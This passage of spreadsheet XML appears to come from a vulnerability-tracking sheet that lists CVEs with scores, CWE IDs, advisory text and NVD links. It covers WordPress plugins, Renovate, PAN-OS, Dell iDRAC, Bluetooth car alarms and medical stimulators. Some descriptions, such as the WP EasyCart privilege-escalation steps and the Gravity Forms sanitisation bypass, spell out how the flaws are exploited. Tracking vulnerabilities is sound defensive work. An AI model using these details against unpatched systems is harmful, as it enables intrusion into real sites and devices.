          <t>aws</t>
        </is>
      </c>
      <c r="H2988" s="5" t="inlineStr"/>
      <c r="I2988" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2988" s="5" t="inlineStr"/>
      <c r="K2988" s="5" t="inlineStr">
        <is>
          <t>CWE-379</t>
        </is>
      </c>
      <c r="L2988" s="5" t="inlineStr">
        <is>
          <t>Creation of a temporary file in a directory with insecure permissions in the FPGA management tool installation component in AWS FPGA Development Kit (aws-fpga) before 2.3.4 might allow local users to execute arbitrary code with root privileges via crafted shell content placed at a predictable path in a world-writable temporary directory, which the installation step reads after elevating its own privileges.
To remediate this issue, users should upgrade to version 2.3.4.</t>
        </is>
      </c>
      <c r="M2988" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85028</t>
        </is>
      </c>
    </row>
    <row r="2989">
      <c r="A2989" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2989" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88017</t>
        </is>
      </c>
      <c r="C2989" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2989" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2989" s="5" t="inlineStr"/>
      <c r="F2989" s="5" t="inlineStr"/>
      <c r="G2989" s="5" t="inlineStr"/>
      <c r="H2989" s="5" t="inlineStr"/>
      <c r="I2989" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2989" s="5" t="inlineStr"/>
      <c r="K2989" s="5" t="inlineStr">
        <is>
          <t>CWE-488</t>
        </is>
      </c>
      <c r="L2989"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M2989" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88017</t>
        </is>
      </c>
    </row>
    <row r="2990">
      <c r="A2990" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2990" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88885</t>
        </is>
      </c>
      <c r="C2990" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2990" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2990" s="5" t="inlineStr"/>
      <c r="F2990" s="5" t="inlineStr"/>
      <c r="G2990" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H2990" s="5" t="inlineStr"/>
      <c r="I2990" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2990" s="5" t="inlineStr"/>
      <c r="K2990" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2990" s="5" t="inlineStr">
        <is>
          <t>Renovate before 44.14.7 contains a command injection vulnerability in the gomod manager when processing unescaped depName parameters in import-path update commands with binarySource=docker mode. Attackers can inject shell metacharacters through malicious dependency names to execute arbitrary commands as the Renovate user during Go module major version updates with postUpdateOptions gomodUpdateImportPaths enabled.</t>
        </is>
      </c>
      <c r="M2990" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88885</t>
        </is>
      </c>
    </row>
    <row r="2991">
      <c r="A2991" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2991" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88888</t>
        </is>
      </c>
      <c r="C2991" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2991" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2991" s="5" t="inlineStr"/>
      <c r="F2991" s="5" t="inlineStr"/>
      <c r="G2991" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H2991" s="5" t="inlineStr"/>
      <c r="I2991" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2991" s="5" t="inlineStr"/>
      <c r="K2991" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2991" s="5" t="inlineStr">
        <is>
          <t>Renovate before 44.14.7 contains a command injection vulnerability in the Mix manager when processing private dependencies with unescaped organization parameters. Attackers can inject shell metacharacters through malicious package names to execute arbitrary commands as the Renovate user in binarySource=docker mode.</t>
        </is>
      </c>
      <c r="M2991" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88888</t>
        </is>
      </c>
    </row>
    <row r="2992">
      <c r="A2992" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2992" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89087</t>
        </is>
      </c>
      <c r="C2992" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="D2992" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2992" s="5" t="inlineStr"/>
      <c r="F2992" s="5" t="inlineStr"/>
      <c r="G2992" s="5" t="inlineStr"/>
      <c r="H2992" s="5" t="inlineStr"/>
      <c r="I2992" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2992" s="5" t="inlineStr"/>
      <c r="K2992" s="5" t="inlineStr">
        <is>
          <t>CWE-573</t>
        </is>
      </c>
      <c r="L2992" s="5" t="inlineStr">
        <is>
          <t>The cstruct package before 6.3.0 for OCaml mishandles indexes.</t>
        </is>
      </c>
      <c r="M2992" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89087</t>
        </is>
      </c>
    </row>
    <row r="2993">
      <c r="A2993" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2993" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0310</t>
        </is>
      </c>
      <c r="C2993" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D2993" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2993" s="5" t="inlineStr"/>
      <c r="F2993" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2993" s="5" t="inlineStr">
        <is>
          <t>palo alto</t>
        </is>
      </c>
      <c r="H2993" s="5" t="inlineStr"/>
      <c r="I2993" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2993" s="5" t="inlineStr"/>
      <c r="K2993" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2993" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow vulnerability in the XML processing functionality of Palo Alto Networks PAN-OS® software enables an unauthenticated attacker with network access to the management web or dataplane interface to cause a denial of service (DoS) condition on VM-Series firewalls or execute arbitrary code with root privileges on the PA-Series firewalls.
The security risk posed by this issue is minimized when the management interface is restricted to only trusted internal IP addresses according to our recommended  best practice deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 . 
Panorama is impacted by this vulnerability.</t>
        </is>
      </c>
      <c r="M2993" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0310</t>
        </is>
      </c>
    </row>
    <row r="2994">
      <c r="A2994" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2994" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13359</t>
        </is>
      </c>
      <c r="C2994" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D2994" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2994" s="5" t="inlineStr"/>
      <c r="F2994" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2994" s="5" t="inlineStr"/>
      <c r="H2994" s="5" t="inlineStr"/>
      <c r="I2994" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2994" s="5" t="inlineStr"/>
      <c r="K2994" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2994" s="5" t="inlineStr">
        <is>
          <t>The Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via cntctfrm_contact_dropdown Parameter in all versions up to, and including, 1.7.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The injected payload executes in the context of an administrator's browser session when they visit the plugin's message manager page at /wp-admin/admin.php?page=cntctfrmtdb_manager, making it possible to compromise administrator-level sessions via a simple unauthenticated contact form submission.</t>
        </is>
      </c>
      <c r="M2994" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13359</t>
        </is>
      </c>
    </row>
    <row r="2995">
      <c r="A2995" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2995" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14989</t>
        </is>
      </c>
      <c r="C2995" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D2995" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2995" s="5" t="inlineStr"/>
      <c r="F2995" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2995" s="5" t="inlineStr"/>
      <c r="H2995" s="5" t="inlineStr"/>
      <c r="I2995" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2995" s="5" t="inlineStr"/>
      <c r="K2995" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2995" s="5" t="inlineStr">
        <is>
          <t>The Cookie Banner for GDPR / CCPA – WPLP Cookie Consent plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wpl_user_preference' parameter in all versions up to, and including, 4.4.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The consent-logging AJAX endpoint is registered for unauthenticated users and its required nonce (wpl_consent_logging_nonce) is publicly emitted via wp_localize_script on the frontend, meaning any unauthenticated site visitor can plant a payload without any prior authentication or privileged access.</t>
        </is>
      </c>
      <c r="M2995" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14989</t>
        </is>
      </c>
    </row>
    <row r="2996">
      <c r="A2996" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2996" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15984</t>
        </is>
      </c>
      <c r="C2996" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D2996" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2996" s="5" t="inlineStr"/>
      <c r="F2996" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2996" s="5" t="inlineStr"/>
      <c r="H2996" s="5" t="inlineStr"/>
      <c r="I2996" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J2996" s="5" t="inlineStr"/>
      <c r="K2996" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2996" s="5" t="inlineStr">
        <is>
          <t>The QuickCal plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Custom Field Parameters in all versions up to, and including, 1.0.20 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The nonce guarding the unauthenticated booked_add_appt AJAX action is publicly embedded on any page rendering the booking calendar shortcode, making it trivially obtainable by unauthenticated attackers without any prior account or privilege.</t>
        </is>
      </c>
      <c r="M2996" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15984</t>
        </is>
      </c>
    </row>
    <row r="2997">
      <c r="A2997" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2997" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16649</t>
        </is>
      </c>
      <c r="C2997" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D2997" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2997" s="5" t="inlineStr"/>
      <c r="F2997" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2997" s="5" t="inlineStr"/>
      <c r="H2997" s="5" t="inlineStr"/>
      <c r="I2997" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J2997" s="5" t="inlineStr"/>
      <c r="K2997" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2997" s="5" t="inlineStr">
        <is>
          <t>The Gravity Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Post Body Field Value in all versions up to, and including, 2.10.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The exploit survives save-time sanitization because wp_kses_post allows the required HTML tags and attributes, and the client-side tooltip script re-parses the browser-decoded aria-label value as innerHTML while only stripping script elements, leaving onerror and other event-handler attributes fully intact and executable.</t>
        </is>
      </c>
      <c r="M2997" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16649</t>
        </is>
      </c>
    </row>
    <row r="2998">
      <c r="A2998" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2998" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17037</t>
        </is>
      </c>
      <c r="C2998" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D2998" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2998" s="5" t="inlineStr"/>
      <c r="F2998" s="5" t="inlineStr"/>
      <c r="G2998" s="5" t="inlineStr"/>
      <c r="H2998" s="5" t="inlineStr"/>
      <c r="I2998" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2998" s="5" t="inlineStr"/>
      <c r="K2998" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2998" s="5" t="inlineStr">
        <is>
          <t>The Kirki – Freeform Page Builder, Website Builder &amp; Customizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘comment’ parameter in all versions up to, and including, 6.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="M2998" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17037</t>
        </is>
      </c>
    </row>
    <row r="2999">
      <c r="A2999" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2999" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17553</t>
        </is>
      </c>
      <c r="C2999" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D2999" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2999" s="5" t="inlineStr"/>
      <c r="F2999" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2999" s="5" t="inlineStr"/>
      <c r="H2999" s="5" t="inlineStr"/>
      <c r="I2999" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2999" s="5" t="inlineStr"/>
      <c r="K2999" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L2999" s="5" t="inlineStr">
        <is>
          <t>The WP EasyCart plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.9.3. This is due to the ec_ajax_save_page_default_options() AJAX handler iterating over every $_POST key and passing it directly into update_option() without any allowlist, while gating the handler only on 'manage_options' OR the plugin's custom 'wpec_manager' capability. The plugin's built-in 'wpec_store_manager' role holds 'wpec_manager' but not 'manage_options', and the required nonce is emitted on frontend product/category templates that render for any user with 'wpec_manager'. This makes it possible for authenticated attackers, with Store Manager-level access and above, to elevate their privileges to administrator by updating arbitrary WordPress options such as default_role='administrator' and users_can_register='1', then self-registering a new account that is assigned the administrator role.</t>
        </is>
      </c>
      <c r="M2999" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17553</t>
        </is>
      </c>
    </row>
    <row r="3000">
      <c r="A3000" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3000" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18164</t>
        </is>
      </c>
      <c r="C3000" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3000" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3000" s="5" t="inlineStr"/>
      <c r="F3000" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3000" s="5" t="inlineStr"/>
      <c r="H3000" s="5" t="inlineStr"/>
      <c r="I3000" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3000" s="5" t="inlineStr"/>
      <c r="K3000" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L3000" s="5" t="inlineStr">
        <is>
          <t>An undocumented hard-coded credential, shared by all device units, is authorized to bypass authentication. This allows an attacker within Bluetooth range to arbitrarily manipulate brain stimulation parameters and state.</t>
        </is>
      </c>
      <c r="M3000" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18164</t>
        </is>
      </c>
    </row>
    <row r="3001">
      <c r="A3001" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3001" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18255</t>
        </is>
      </c>
      <c r="C3001" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3001" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3001" s="5" t="inlineStr"/>
      <c r="F3001" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3001" s="5" t="inlineStr"/>
      <c r="H3001" s="5" t="inlineStr"/>
      <c r="I3001" s="5" t="inlineStr">
        <is>
          <t>2026-07-29</t>
        </is>
      </c>
      <c r="J3001" s="5" t="inlineStr"/>
      <c r="K3001" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3001" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Quay. A user configured in GLOBAL_READONLY_SUPER_USERS is able to view robot account tokens for repositories they are not a member of, allowing an attacker with read-only superuser privileges to impersonate any robot account.</t>
        </is>
      </c>
      <c r="M3001" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18255</t>
        </is>
      </c>
    </row>
    <row r="3002">
      <c r="A3002" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3002" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18406</t>
        </is>
      </c>
      <c r="C3002" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3002" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3002" s="5" t="inlineStr"/>
      <c r="F3002" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3002" s="5" t="inlineStr"/>
      <c r="H3002" s="5" t="inlineStr"/>
      <c r="I3002" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3002" s="5" t="inlineStr"/>
      <c r="K3002" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3002" s="5" t="inlineStr">
        <is>
          <t>The SureForms – Contact Form Builder, AI Forms, Payment Form, Survey &amp; Quiz plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Text Field Entity-Encoded Payload in all versions up to, and including, 2.12.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="M3002" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18406</t>
        </is>
      </c>
    </row>
    <row r="3003">
      <c r="A3003" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3003" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18411</t>
        </is>
      </c>
      <c r="C3003" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3003" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3003" s="5" t="inlineStr"/>
      <c r="F3003" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3003" s="5" t="inlineStr"/>
      <c r="H3003" s="5" t="inlineStr"/>
      <c r="I3003" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J3003" s="5" t="inlineStr"/>
      <c r="K3003" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L3003" s="5" t="inlineStr">
        <is>
          <t>The KARR Security System and SWDS dealer-installed automotive anti-theft systems use a shared Bluetooth authentication key across affected devices. An attacker within Bluetooth range can leverage this weakness to issue unauthorized commands to the vehicle, potentially allowing unauthorized access to vehicle functions, including door unlocking and engine immobilization.</t>
        </is>
      </c>
      <c r="M3003" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18411</t>
        </is>
      </c>
    </row>
    <row r="3004">
      <c r="A3004" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3004" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18579</t>
        </is>
      </c>
      <c r="C3004" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3004" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3004" s="5" t="inlineStr"/>
      <c r="F3004" s="5" t="inlineStr"/>
      <c r="G3004" s="5" t="inlineStr"/>
      <c r="H3004" s="5" t="inlineStr"/>
      <c r="I3004" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3004" s="5" t="inlineStr"/>
      <c r="K3004" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3004" s="5" t="inlineStr">
        <is>
          <t>The WP Photo Album Plus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'HTTP_X_FORWARDED_FOR' parameter in all versions up to, and including, 9.2.08.003 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The nonce failure path for the getshortcodedrenderedfenodelay action serves as the log-write trigger rather than an access barrier — a deliberately failed nonce check causes wppa_log() to record the attacker-supplied X-Forwarded-For value to disk, making the exploit fully reachable by unauthenticated callers via the wp_ajax_nopriv_wppa endpoint.</t>
        </is>
      </c>
      <c r="M3004" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18579</t>
        </is>
      </c>
    </row>
    <row r="3005">
      <c r="A3005" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3005" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18844</t>
        </is>
      </c>
      <c r="C3005" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3005" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3005" s="5" t="inlineStr"/>
      <c r="F3005" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3005" s="5" t="inlineStr"/>
      <c r="H3005" s="5" t="inlineStr"/>
      <c r="I3005" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3005" s="5" t="inlineStr"/>
      <c r="K3005" s="5" t="inlineStr">
        <is>
          <t>CWE-912</t>
        </is>
      </c>
      <c r="L3005" s="5" t="inlineStr">
        <is>
          <t>The firmware of the Pulsetto Vagus Nerve Stimulator accepts several undisclosed commands over its Bluetooth Low Energy (BLE) interface. These commands are sent without authentication or encryption, and are never issued by the companion mobile application, yet are fully processed by the device when it is powered on.</t>
        </is>
      </c>
      <c r="M3005" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18844</t>
        </is>
      </c>
    </row>
    <row r="3006">
      <c r="A3006" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3006" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19224</t>
        </is>
      </c>
      <c r="C3006" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3006" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3006" s="5" t="inlineStr"/>
      <c r="F3006" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3006" s="5" t="inlineStr"/>
      <c r="H3006" s="5" t="inlineStr"/>
      <c r="I3006" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3006" s="5" t="inlineStr"/>
      <c r="K3006" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L3006" s="5" t="inlineStr">
        <is>
          <t>The Hummingbird Performance  WordPress plugin before 3.21.2 does not restrict a network-wide setting to network administrators, allowing an administrator of any single site on a multisite network to execute arbitrary code across the entire network.</t>
        </is>
      </c>
      <c r="M3006" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19224</t>
        </is>
      </c>
    </row>
    <row r="3007">
      <c r="A3007" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3007" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19769</t>
        </is>
      </c>
      <c r="C3007" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3007" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3007" s="5" t="inlineStr"/>
      <c r="F3007" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3007" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3007" s="5" t="inlineStr"/>
      <c r="I3007" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3007" s="5" t="inlineStr"/>
      <c r="K3007" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3007" s="5" t="inlineStr">
        <is>
          <t>The Ninja Forms – The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Repeater Child 'type' Confusion via Unmatched Array Key in all versions up to, and including, 3.15.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Exploitation requires the Ninja Forms File Uploads add-on to be active, as the attack routes the unwhitelisted child entry through the File Uploads handler to write an attacker-supplied HTML file containing arbitrary JavaScript into any web-server-writable directory, including the site root, where it is served from the site's own origin.</t>
        </is>
      </c>
      <c r="M3007" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19769</t>
        </is>
      </c>
    </row>
    <row r="3008">
      <c r="A3008" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3008" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23855</t>
        </is>
      </c>
      <c r="C3008" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3008" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3008" s="5" t="inlineStr"/>
      <c r="F3008" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G3008" s="5" t="inlineStr"/>
      <c r="H3008" s="5" t="inlineStr"/>
      <c r="I3008" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3008" s="5" t="inlineStr"/>
      <c r="K3008" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3008" s="5" t="inlineStr">
        <is>
          <t>Dell iDRAC9, 14G versions prior to 7.00.00.184, 15G/16G versions prior to 7.30.10.50, and Dell iDRAC10, 17G versions prior to 1.30.30.50, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to command injection.</t>
        </is>
      </c>
      <c r="M3008" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23855</t>
        </is>
      </c>
    </row>
    <row r="3009">
      <c r="A3009" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3009" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27459</t>
        </is>
      </c>
      <c r="C3009" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3009" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3009" s="5" t="inlineStr"/>
      <c r="F3009" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3009" s="5" t="inlineStr">
        <is>
          <t>openssl, python</t>
        </is>
      </c>
